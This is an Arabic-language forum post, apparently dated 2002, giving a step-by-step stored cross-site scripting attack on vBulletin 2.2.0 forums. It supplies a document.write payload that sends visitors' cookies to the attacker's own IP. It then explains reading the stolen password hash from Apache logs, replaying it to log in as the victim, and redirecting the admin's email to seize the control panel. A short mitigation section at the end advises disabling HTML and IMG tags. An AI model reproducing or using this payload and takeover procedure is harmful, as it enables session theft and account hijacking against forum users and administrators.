قم بكتابة موضوع جديد او رد (في منتدى يدعم الـ HTML ) .. ثم اكتب اي موضوع والصق بين السطور هذا الكود :
document.write(‘<img
src=”http://my_ip_address/’+document.cookie+'”>&#8217;;

مع ملاحظة تغير الـ IP Adress الى رقم الـ IP الخاص بك .

وعندما يقوم شخص ما بقراءة محتوى الصفحة فان السكربت الذي قمنا بوضعه سيقوم بتنفيذ الاوامر في جهاز وقراءة جزء
من احد ملفات الكوكيز التي تحتوي على الباسورد الخاصة بالمنتدى .. ثم يقوم السكربت بتحويل هذه السطور الى رقم
الاي بي الذي قمنا بكتابته سابقا (مع ملاحظة انه يجب ان يكون على جهازي سيرفر مثل IIS او Apache او غيرها ) .

وبعد ان تتم العملية بنجاح قم بفتح ملف الـ Log الخاص بالسيرفر الذي يحتويه جهازك ..
مثال لو كان السيرفر اباتشي .. فتاح المجلد Apche واختر logs واختر Acces Log .
ستجد جميع الاوامر التي طلبتها من السيرفر .. إلخ

ابحث عن الكود الخاص بالباسورد .. مثال :

GET/ bbuserid=86;%20bbpassword=dd6169d68822a116cd97e1fb

ddf90622;%20sessionhash=a
4719cd620534914930b86839c4bb5f8;%20bbthreadview[54

20]=1012444064;%20bblastvi
sit=1011983161

فكر قليلا الان .. اين الباسورد ؟؟
الباسورد موجودة لكن بطريقة مشفرة يصعب كسرها .. اذن مالحل ؟
قم بنسخ الكود الذي وجدته والصقه في المتصفح .. بهذا الشكل
http://www.victim.com/vb/index.php?bbuserid=%5Buserid%5D&bbpassword=%5Bpassword hash]
ستجد عبارة : ” أهلا بعودتك يـا ( اسم الذي سرقت منه الكوكيز….) “
في هذه الحالة انت الان تستطيع التحكم بكل شي وكانك مدير المنتدى (الذي سرقت منه الكوكيز) ..
لكننا نحتاج الى كلمة المرور للدخول الى لوحة التحكم .. اذهب الى (التحكم) وقم بتعديل البريد الالكتروني الى بريدك الخاص
وثم قم بتسجيل الخروج .. ثم اذهب الى اداة Forgot Password .. وعندها تستطيع استقبال بريد يحتوي باسورد الادمن ..

اعتقد انك تعلم ما يجب ان تفعله بعد ذلك !! ادخل الى لوحة التحكم وافعل ما تشاء .. !

————
الحل
———–

للحماية من هذه الثغرة قم باغلاق الـ HTML في (المنتدى + الرسائل الخاصة + التواقيع + التقويم + … )
(واي منفذ يمكن من خلاله وضع كود HTML باي صورة كانت )

كما يجب اغلا كود الـ IMG .. لانه ببساطة بامكانك استخدامه بدل كلمة فاذا وضعت او او
اي كلمة اخرى فانه سيتم تنفيذ السكربت بشكل او باخر … لذا كن حذرا واغلق هذه المنافذ .
Be Secret .. Dont’ be Lamer .

تاريخ اكتشاف الثغرة : 31 – 1 – 2002
تم تجربتها على الاصدار 2.2.0 وهي تعمل بنجاح .

السريفر الشخصي

http://belnet.dl.sourceforge.net/so…ptriad2-2-1.exe
هذا سريفر الاباتشي